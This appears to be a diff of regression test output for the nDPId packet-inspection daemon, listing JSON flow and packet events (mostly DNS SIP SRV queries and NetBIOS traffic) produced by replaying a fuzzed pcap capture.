00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470187658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470187658,"pkt":"ADBUADRWAODtAW69CABBAABIarMAAIARTJ7xqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470187658,"pkt":"ADBUADRWAODtAW69CABBAABIarMAAIARTJ7xqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470199678} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470199678}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470200673,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470200673,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1120470200673,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470200673,"pkt":"ADBUADRWAODtAW69CABFAABIaqsAAIARTJ3AFgECwKgBAQrIADUANHAIufQBALQBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1120470200673,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470200673,"pkt":"ADBUADRWAODtAW69CABFAABIaqsAAIARTJ3AFgECwKgBAQrIADUANHAIufQBALQBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1120470202676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69CABFAABIarUAAIARTJzAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEZXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1120470202676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69CABFAABIarUAAIARTJzAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEZXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":47872,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69uwBFAABIarYAAIARTJvAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":47872,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69uwBFAABIarYAAIARTJvAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":47872,"global_ts_msec":1120470204679} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":47872,"global_ts_msec":1120470204679}
00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"\/zT\/\/\/\/\/AODVAW69CABFAFJOarcAAIARkZbAqAECwKgB\/wCJAIkAOlt+hR0BEAABAAAAAABFIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"\/zT\/\/\/\/\/AODVAW69CABFAFJOarcAAIARkZbAqAECwKgB\/wCJAIkAOlt+hR0BEAABAAAAAABFIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470207908} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470207908}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"\/\/\/\/\/\/\/\/AODtAW69JXMAAABOargAAIARS5XAqAECwKgB\/wCJAIkAOlt+hZ0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOREJFSkVPQ0FDQUNBQ0GQQUJNAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"\/\/\/\/\/\/\/\/AODtAW69JXMAAABOargAAIARS5XAqAECwKgB\/wCJAIkAOlt+hZ0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOREJFSkVPQ0FDQUNBQ0GQQUJNAAAgAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470208654} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470208654}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1120470208684,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470208684,"pkt":"ADBUADRWAODtAW69CABFAABIarkAAIARTJjAqAECwKgBAQrIADUANHAIufQBAAABAAAAADYABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1120470208684,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470208684,"pkt":"ADBUADRWAODtAW69CABFAABIarkAAIARTJjAqAECwKgBAQrIADUANHAIufQBAAABAAAAADYABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -545,27 +545,27 @@
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1120470219780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CABFAABIar8AAIARTJLAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AnNrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1120470219780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CABFAABIar8AAIARTJLAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AnNrAAAhAAE="}
00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW4lcwBFAABIasAAAIARTJHAqAECwKglcwDKADUANKsCfvgBAAABAAAAAAgABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW4lcwBFAABIasAAAIARTJHAqAECwKglcwDKADUANKsCfvgBAAABAAAAAAgABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470221783} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470221783}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CACbAABIasEEAIARTJDAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CACbAABIasEEAIARTJDAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470225789} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470225789}
00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
